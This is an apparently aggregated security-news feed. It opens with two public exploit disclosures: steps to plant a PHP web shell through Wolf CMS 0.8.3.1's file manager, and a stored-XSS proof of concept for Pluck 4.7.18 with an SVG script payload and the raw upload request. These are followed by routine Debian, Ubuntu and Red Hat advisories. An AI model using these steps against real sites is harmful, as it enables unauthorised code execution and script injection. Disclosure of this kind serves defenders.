Wolf CMS version 0.8.3.1 suffers from a remote shell upload vulnerability.

    # Exploit Title: Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)# Date: 2023-05-02# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://wolf-cms.readthedocs.io# Software Link: https://github.com/wolfcms/wolfcms# Version: 0.8.3.1# Tested on: Kali Linux### Steps to Reproduce #### Firstly, go to the "Files" tab.# Click on the "Create new file" button and create a php file (e.g:shell.php)# Then, click on the file you created to edit it.# Now, enter your shell code and save the file.# Finally, go to https://localhost/wolfcms/public/shell.php### There's your shell! ###

Wolf CMS 0.8.3.1 Shell Upload

Debian Linux Security Advisory 5396-2 - The webkit2gtk update released as 5396-1 introduced a compatibility problem that caused Evolution to display e-mail incorrectly. Evolution has been updated to solve this issue.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5396-2                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
May 04, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : evolution  
Debian Bug     : 1035469

The webkit2gtk update released as 5396-1 introduced a compatibility  
problem that caused Evolution to display e-mail incorrectly. Evolution  
has been updated to solve this issue.

For the stable distribution (bullseye), this problem has been fixed in  
version 3.38.3-1+deb11u2.

We recommend that you upgrade your evolution packages.

For the detailed security status of evolution please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/evolution

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmRT6FEACgkQAAyEYu0C  
2ALibg/9FWGsSbwd8IEBJ71YIUsRj9arilW4oj2ur4W0mSIINlBuU+LZi+DyBC0r  
NJmSJWbJHyUBpdvNI6bSkSApUXj91oNuNUxZ4sdyGIHgqh/n8yHLOYdTIozA9Dg7  
6EmHBsy864csERzS5yQCD+MTr4d84tjXm9lb5AlZBW+BjrDPwd1GVqzdTKfLddGx  
pQxehkGsthn4B5pjuvrm0byoHtz8o5jhRlq1CEYOv3+nsvG1ea8CM3YXUH9uef2e  
zi4ib77KxI3GthP9l76/lRB+CRrWMjeqzt6zBPHVV7QJ20E+p8KW+rZqoDwoY9n+  
W3iPDbB/KZVh6/vXNoDBBjKs9HrxjTyvGFYvaNEt9qODAAnwQWtDQoA/nufiD+AY  
NlYqLkKuweXBpgoO+L9c9G+9PX+QLuI7ifi6s/v1iAF0jp+/aiS/PR2q+BPRcikd  
0q/Qg0dFdDUkb8snRJTBI44wSkq7jVBLNJ5CKFYjVbjP+bEtHQKtAw3YIC7mto2W  
VxTHIJLkJw1oiiMZqrg2s/tdVb5WwXRaIkW/1MpS3zLUVWKMOOgQCwqM1TzWulsP  
DJdaNHQW+V1POESkbHM6BY6XgXFGrltR/433h7TzVJSKVO2igDfocOL6JIa7hE7l  
x7MRT7aFA50Ao63lUEyHmK1Sz+qA8Ku0rO8g8URI8v0Djy1BCZI=  
=Az5K  
-----END PGP SIGNATURE-----

Debian Security Advisory 5396-2

Pluck CMS version 4.7.18 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: pluck v4.7.18 - Stored Cross-Site Scripting (XSS)Application: pluckVersion: 4.7.18Bugs:  XSSTechnology: PHPVendor URL: https://github.com/pluck-cms/pluckSoftware Link: https://github.com/pluck-cms/pluckDate of found: 01-05-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. create .svg file.2. svg file content:<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>3. upload file (http://localhost/pluck-4.7.18/admin.php?action=files)poc requestPOST /pluck-4.7.18/admin.php?action=files HTTP/1.1Host: localhostContent-Length: 672Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryJMTiFxESCx7aNqmIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/pluck-4.7.18/admin.php?action=filesAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=s34g5lr0qg5m4qh0ph5plmo8deConnection: close------WebKitFormBoundaryJMTiFxESCx7aNqmIContent-Disposition: form-data; name="filefile"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundaryJMTiFxESCx7aNqmIContent-Disposition: form-data; name="submit"Upload------WebKitFormBoundaryJMTiFxESCx7aNqmI--4. go to http://localhost/pluck-4.7.18/files/svg_xss.svg

Pluck CMS 4.7.18 Cross Site Scripting

Ubuntu Security Notice 6056-1 - It was discovered that a race condition existed in the Xen transport layer implementation for the 9P file system protocol in the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or expose sensitive information.

    ==========================================================================Ubuntu Security Notice USN-6056-1May 05, 2023linux-oem-6.1 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:The guest VM system could be made to crash or expose sensitive information.Software Description:- linux-oem-6.1: Linux kernel for OEM systemsDetails:It was discovered that a race condition existed in the Xen transport layerimplementation for the 9P file system protocol in the Linux kernel, leadingto a use-after-free vulnerability. A local attacker could use this to causea denial of service (guest crash) or expose sensitive information (guestkernel memory).Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-6.1.0-1010-oem      6.1.0-1010.10   linux-image-oem-22.04c          6.1.0.1010.10After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6056-1   CVE-2023-1859Package Information:   https://launchpad.net/ubuntu/+source/linux-oem-6.1/6.1.0-1010.10

Ubuntu Security Notice USN-6056-1

Red Hat Security Advisory 2023-2126-01 - Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the Internet Protocol Security and uses strong cryptography to provide both authentication and encryption services. These services allow you to build secure tunnels through untrusted networks such as virtual private network.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libreswan security update  
Advisory ID:       RHSA-2023:2126-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:2126  
Issue date:        2023-05-04  
CVE Names:         CVE-2023-30570   
=====================================================================

1. Summary:

An update for libreswan is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - aarch64, ppc64le, s390x, x86_64

3. Description:

Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the  
Internet Protocol Security and uses strong cryptography to provide both  
authentication and encryption services. These services allow you to build  
secure tunnels through untrusted networks such as virtual private network  
(VPN).

Security Fix(es):

* libreswan: Malicious IKEv1 Aggressive Mode packets can crash libreswan  
(CVE-2023-30570)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2187165 - CVE-2023-30570 libreswan: Malicious IKEv1 Aggressive Mode packets can crash libreswan

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
libreswan-3.29-7.el8_1.2.src.rpm

aarch64:  
libreswan-3.29-7.el8_1.2.aarch64.rpm  
libreswan-debuginfo-3.29-7.el8_1.2.aarch64.rpm  
libreswan-debugsource-3.29-7.el8_1.2.aarch64.rpm

ppc64le:  
libreswan-3.29-7.el8_1.2.ppc64le.rpm  
libreswan-debuginfo-3.29-7.el8_1.2.ppc64le.rpm  
libreswan-debugsource-3.29-7.el8_1.2.ppc64le.rpm

s390x:  
libreswan-3.29-7.el8_1.2.s390x.rpm  
libreswan-debuginfo-3.29-7.el8_1.2.s390x.rpm  
libreswan-debugsource-3.29-7.el8_1.2.s390x.rpm

x86_64:  
libreswan-3.29-7.el8_1.2.x86_64.rpm  
libreswan-debuginfo-3.29-7.el8_1.2.x86_64.rpm  
libreswan-debugsource-3.29-7.el8_1.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-30570  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZFPxuNzjgjWX9erEAQh+Dg//WziVZjrT5hdmWCcg1QyDTq/e0XzuSJ80  
v3wU/suF/3Iimen9qEFY5WGTziN1iIeQRzDD6BAV4OwEQzf0YKr8CviaRWNfRDSK  
G5EGKALl/AfUdDxQWR7f3IB4yGk/zokdPqHQNIxbM49lIChQaetdmB+wo4fJosyO  
EbDnx5EyrlErQeGRmsMmVosn4VVOJnG6RBLsfUWa/9FzZnepso/K2kA0NRRpzIEa  
+n76yUDSvX4/QbWpZ6zDeTiwY7g1JqRcNYT5Wqypd03/QyowrRT59FzsFm7/eI68  
dtlyiC2uszMJHb/wOgqHNCQ8NZ4lFMNSvrRyLNiC/FC6CoNa/2UsH5luUf3mngnd  
JDNkugJC1NcxUxmIAYm0ytgRS/hy/YyrcfuobMt1lAEAZm8rIJSvJ0gwNZiOghs4  
56GFwuk0WgEApYFSWU72Pp4SafHh8hkR6+1hdpdYo5f2gR9moxPCKQbuGy03Ti3r  
Hq6KyFnBjk+DxR0Bsja6ZMta4yBowicNNq8bF0yrYKOLLs8rmOXQEAleS99LijpI  
0hpRgUEiLakuUmn7bRE/ThJHwphI7lii2wON6efT8yPzNZVffk7kZpSW0HgX0a9o  
PHqY4IUgQjRr8jCR9yjNrAOZEvg6AI0qKnk/VrU1QfhdkQPmGXwEVi0QiuXMlizR  
lzLLoqFkfVc=  
=GVIo  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-2126-01

Red Hat Security Advisory 2023-2124-01 - Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the Internet Protocol Security and uses strong cryptography to provide both authentication and encryption services. These services allow you to build secure tunnels through untrusted networks such as virtual private network.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libreswan security update  
Advisory ID:       RHSA-2023:2124-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:2124  
Issue date:        2023-05-04  
CVE Names:         CVE-2023-30570   
=====================================================================

1. Summary:

An update for libreswan is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64

3. Description:

Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the  
Internet Protocol Security and uses strong cryptography to provide both  
authentication and encryption services. These services allow you to build  
secure tunnels through untrusted networks such as virtual private network  
(VPN).

Security Fix(es):

* libreswan: Malicious IKEv1 Aggressive Mode packets can crash libreswan  
(CVE-2023-30570)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2187165 - CVE-2023-30570 libreswan: Malicious IKEv1 Aggressive Mode packets can crash libreswan

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
libreswan-3.29-7.el8_2.2.src.rpm

aarch64:  
libreswan-3.29-7.el8_2.2.aarch64.rpm  
libreswan-debuginfo-3.29-7.el8_2.2.aarch64.rpm  
libreswan-debugsource-3.29-7.el8_2.2.aarch64.rpm

ppc64le:  
libreswan-3.29-7.el8_2.2.ppc64le.rpm  
libreswan-debuginfo-3.29-7.el8_2.2.ppc64le.rpm  
libreswan-debugsource-3.29-7.el8_2.2.ppc64le.rpm

s390x:  
libreswan-3.29-7.el8_2.2.s390x.rpm  
libreswan-debuginfo-3.29-7.el8_2.2.s390x.rpm  
libreswan-debugsource-3.29-7.el8_2.2.s390x.rpm

x86_64:  
libreswan-3.29-7.el8_2.2.x86_64.rpm  
libreswan-debuginfo-3.29-7.el8_2.2.x86_64.rpm  
libreswan-debugsource-3.29-7.el8_2.2.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
libreswan-3.29-7.el8_2.2.src.rpm

aarch64:  
libreswan-3.29-7.el8_2.2.aarch64.rpm  
libreswan-debuginfo-3.29-7.el8_2.2.aarch64.rpm  
libreswan-debugsource-3.29-7.el8_2.2.aarch64.rpm

ppc64le:  
libreswan-3.29-7.el8_2.2.ppc64le.rpm  
libreswan-debuginfo-3.29-7.el8_2.2.ppc64le.rpm  
libreswan-debugsource-3.29-7.el8_2.2.ppc64le.rpm

s390x:  
libreswan-3.29-7.el8_2.2.s390x.rpm  
libreswan-debuginfo-3.29-7.el8_2.2.s390x.rpm  
libreswan-debugsource-3.29-7.el8_2.2.s390x.rpm

x86_64:  
libreswan-3.29-7.el8_2.2.x86_64.rpm  
libreswan-debuginfo-3.29-7.el8_2.2.x86_64.rpm  
libreswan-debugsource-3.29-7.el8_2.2.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
libreswan-3.29-7.el8_2.2.src.rpm

aarch64:  
libreswan-3.29-7.el8_2.2.aarch64.rpm  
libreswan-debuginfo-3.29-7.el8_2.2.aarch64.rpm  
libreswan-debugsource-3.29-7.el8_2.2.aarch64.rpm

ppc64le:  
libreswan-3.29-7.el8_2.2.ppc64le.rpm  
libreswan-debuginfo-3.29-7.el8_2.2.ppc64le.rpm  
libreswan-debugsource-3.29-7.el8_2.2.ppc64le.rpm

s390x:  
libreswan-3.29-7.el8_2.2.s390x.rpm  
libreswan-debuginfo-3.29-7.el8_2.2.s390x.rpm  
libreswan-debugsource-3.29-7.el8_2.2.s390x.rpm

x86_64:  
libreswan-3.29-7.el8_2.2.x86_64.rpm  
libreswan-debuginfo-3.29-7.el8_2.2.x86_64.rpm  
libreswan-debugsource-3.29-7.el8_2.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-30570  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZFPxtNzjgjWX9erEAQi8NhAAk2HzRhscOmVIfgUON7ge2SIWkQ0ye0lf  
6xanBh+lBCPYXRtgzGn8TXrvn/2cw81vMAYZq5TLfFkU6ct45ELCy1p9ehlQr8Ws  
jZKQFetbrJvywvdpwwOGI9H4OYSYCDbmP37PYdUzQNLYzeRxkECpOlfeOJaruVIk  
FGEus7upC33EPP9tBEqzD8qt7aj+wgP/AsYqn+Jn9cYOVEGJC8SymGNvJP6eQFPy  
Ms6AWe+PWX8HtgxgTU68kFWVzaTOZ9WH4zi31iQEK7o9BVkjeAGQmVMHvMRM2UYg  
Uc2G4DmlCEY8BFcCa/zbrDX2jDroTzGsc8VRN8R688S5uNDEMoTRXIk3JKZVIbHZ  
F2Vg4qS5uidBQNGc1yICmQps7Xl0os6qAiSe0KUiCA4WCntmpP/AxqYFIkE3Scwp  
6IiDf0XSlsQQ0jVaS1VuVB/DHsVi7gh+qQwsF0Fc53ptUG8PzJYRj2gIXbWzrfkj  
ytQT5ThxBjuijVRxRBm+/9mTupEDyqzmAKOW9M6sUFxHLXXkaiEqyyhLmkBd2M+w  
bC7dQEC6rDchQsTBI3Ex9nRHq33BM2S3+K9MF/oJMBgBZFrSXO6buzOTqrYkjC00  
ymtm9nRDxzFmxTqcHthSBrDD61MrJK75bsRG/cCdLjyGlxGWVCP1UJ4Y6KQ1XjnZ  
Cjn4Ymyf53U=  
=RPTC  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-2124-01

Red Hat Security Advisory 2023-2121-01 - Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the Internet Protocol Security and uses strong cryptography to provide both authentication and encryption services. These services allow you to build secure tunnels through untrusted networks such as virtual private network.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libreswan security update  
Advisory ID:       RHSA-2023:2121-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:2121  
Issue date:        2023-05-04  
CVE Names:         CVE-2023-30570   
=====================================================================

1. Summary:

An update for libreswan is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the  
Internet Protocol Security and uses strong cryptography to provide both  
authentication and encryption services. These services allow you to build  
secure tunnels through untrusted networks such as virtual private network  
(VPN).

Security Fix(es):

* libreswan: Malicious IKEv1 Aggressive Mode packets can crash libreswan  
(CVE-2023-30570)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2187165 - CVE-2023-30570 libreswan: Malicious IKEv1 Aggressive Mode packets can crash libreswan

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
libreswan-4.6-3.el9_0.1.src.rpm

aarch64:  
libreswan-4.6-3.el9_0.1.aarch64.rpm  
libreswan-debuginfo-4.6-3.el9_0.1.aarch64.rpm  
libreswan-debugsource-4.6-3.el9_0.1.aarch64.rpm

ppc64le:  
libreswan-4.6-3.el9_0.1.ppc64le.rpm  
libreswan-debuginfo-4.6-3.el9_0.1.ppc64le.rpm  
libreswan-debugsource-4.6-3.el9_0.1.ppc64le.rpm

s390x:  
libreswan-4.6-3.el9_0.1.s390x.rpm  
libreswan-debuginfo-4.6-3.el9_0.1.s390x.rpm  
libreswan-debugsource-4.6-3.el9_0.1.s390x.rpm

x86_64:  
libreswan-4.6-3.el9_0.1.x86_64.rpm  
libreswan-debuginfo-4.6-3.el9_0.1.x86_64.rpm  
libreswan-debugsource-4.6-3.el9_0.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-30570  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZFPxr9zjgjWX9erEAQgpuA//Wj53Qyoa8UhNlIluGDfWsolGCBy9ivqt  
4asgSARByWPrTAYHhLBPkrmBmI8HahJ7vP1sVEgJLkz+/DP2zN6QoqSC+5npxjTf  
QEBVPdQriapBoLODrwd4i3btrcAIp1JnHcMQAZZl+62lw2wcUleg8YkIMTOWhNh1  
0vazCps8AHSNZnR+ABimVEcUgl1USCu2ZpRR+nuRA8/U6uiW0qpjJm9JGqv78D2L  
OoI9AxLWvrjTH8OtEUljNXy4MKkO81qprMZ28bsFQs8NnixZHCyr9nKshHNUfSFE  
LKtLKwCgE3zoVEd+O2vikgHubUlTdtV4bnFgkELryt/cA/AtTI2zuakZ7TUoPn7l  
gNeJ0wmXgUV7JTtAAcSbFQe9tuiZIf2mgc/zGBkfFx/6eIU41ZBmmRqIMWs4nSmf  
Z5j00MQQScp8jThoVWA4q4JDJObHOWjM6T4pC+2Ve0CIQu5eU4u56b+T/UCorVZH  
oZyQDo8+zlJPwxJS2wVcGNt44ngok8ig2/9AlK4H1IeGLNyqr2Efm4d4BxwlmMth  
HOgKvjrsijhLXe/JXtCk1nn3b5kpTFJ3jsgh4wdOLvDMpSmMW0STZLskMdvFZ2hv  
acivXGJEhpZPA4x620jEk8iUkXKYI0gRqhA0ITZ83L5Orct1uCKkbpWZlIsOhaO3  
q9Blzxkvv3Y=  
=N64w  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-2121-01

Red Hat Security Advisory 2023-2122-01 - Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the Internet Protocol Security and uses strong cryptography to provide both authentication and encryption services. These services allow you to build secure tunnels through untrusted networks such as virtual private network.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libreswan security update  
Advisory ID:       RHSA-2023:2122-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:2122  
Issue date:        2023-05-04  
CVE Names:         CVE-2023-30570   
=====================================================================

1. Summary:

An update for libreswan is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the  
Internet Protocol Security and uses strong cryptography to provide both  
authentication and encryption services. These services allow you to build  
secure tunnels through untrusted networks such as virtual private network  
(VPN).

Security Fix(es):

* libreswan: Malicious IKEv1 Aggressive Mode packets can crash libreswan  
(CVE-2023-30570)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2187165 - CVE-2023-30570 libreswan: Malicious IKEv1 Aggressive Mode packets can crash libreswan

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
libreswan-4.5-1.el8_7.1.src.rpm

aarch64:  
libreswan-4.5-1.el8_7.1.aarch64.rpm  
libreswan-debuginfo-4.5-1.el8_7.1.aarch64.rpm  
libreswan-debugsource-4.5-1.el8_7.1.aarch64.rpm

ppc64le:  
libreswan-4.5-1.el8_7.1.ppc64le.rpm  
libreswan-debuginfo-4.5-1.el8_7.1.ppc64le.rpm  
libreswan-debugsource-4.5-1.el8_7.1.ppc64le.rpm

s390x:  
libreswan-4.5-1.el8_7.1.s390x.rpm  
libreswan-debuginfo-4.5-1.el8_7.1.s390x.rpm  
libreswan-debugsource-4.5-1.el8_7.1.s390x.rpm

x86_64:  
libreswan-4.5-1.el8_7.1.x86_64.rpm  
libreswan-debuginfo-4.5-1.el8_7.1.x86_64.rpm  
libreswan-debugsource-4.5-1.el8_7.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-30570  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZFPxRtzjgjWX9erEAQhhfg//TTU38fheR5fVc6p5nEKxwiHftOPseOy8  
KMU1RMuY3Abkrf324SSd8Vv/Iv9JLoii6dJgtU6WuE/XOXnCwt8p8DNEeSQjnB98  
AP7Z+POV+Edqcq2escBnzxrg6MCKDIdQqW/MoG2x6ANgwlJolwOS9G8rej8Blukg  
2+r41Je6u82ea85rQ4Pe7vzGKjQNKb7sHKLa4qV+M5rzCjJcraxKTyFZ+DNEMCf1  
xf2Q43qlhg61Mu+hy4YVK/y/HOaXUWnl5Z+U3BWKCjhOE6jrtLSG5tyPxCH05JWH  
44wo7M+z9xp5yts5jNYsJfVn/EFvqu0iNW3SY/Tf0E6IrGEuPM2VzlDz44TrYJeq  
dEomw3DkyqEujx0jeNmlEj6cQ/0vs4dUq3nGXlhf6oUBavLURU2JZbwlL6MsaI5y  
ANuDm4PTMHRtMd+koE9qh88Wngbsv5tA3iFKM3jhiauA/3Uhiee/sbMJjVMMY5Xr  
8JmqLpE1rMFCnv8nftlAZEDl8ghvLTyR1mMeipHu43xyRl5PU3eapa7A/9y+0zDS  
M990JXsCG6+6nM6aRhZ3880OehVY63em/Tp5qtw6jTvv182kkt0GqgUlzesQ4gXJ  
6PVp0slun35q6DyvyVUTGBer50qWyioiydbSdcxK3TGnVtdtjWJdriFKlP6ibuqA  
4DagD9d6oxE=  
=lswb  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-2122-01

Red Hat Security Advisory 2023-2120-01 - Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the Internet Protocol Security and uses strong cryptography to provide both authentication and encryption services. These services allow you to build secure tunnels through untrusted networks such as virtual private network.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libreswan security update  
Advisory ID:       RHSA-2023:2120-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:2120  
Issue date:        2023-05-04  
CVE Names:         CVE-2023-30570   
=====================================================================

1. Summary:

An update for libreswan is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the  
Internet Protocol Security and uses strong cryptography to provide both  
authentication and encryption services. These services allow you to build  
secure tunnels through untrusted networks such as virtual private network  
(VPN).

Security Fix(es):

* libreswan: Malicious IKEv1 Aggressive Mode packets can crash libreswan  
(CVE-2023-30570)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2187165 - CVE-2023-30570 libreswan: Malicious IKEv1 Aggressive Mode packets can crash libreswan

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
libreswan-4.6-3.el9_1.1.src.rpm

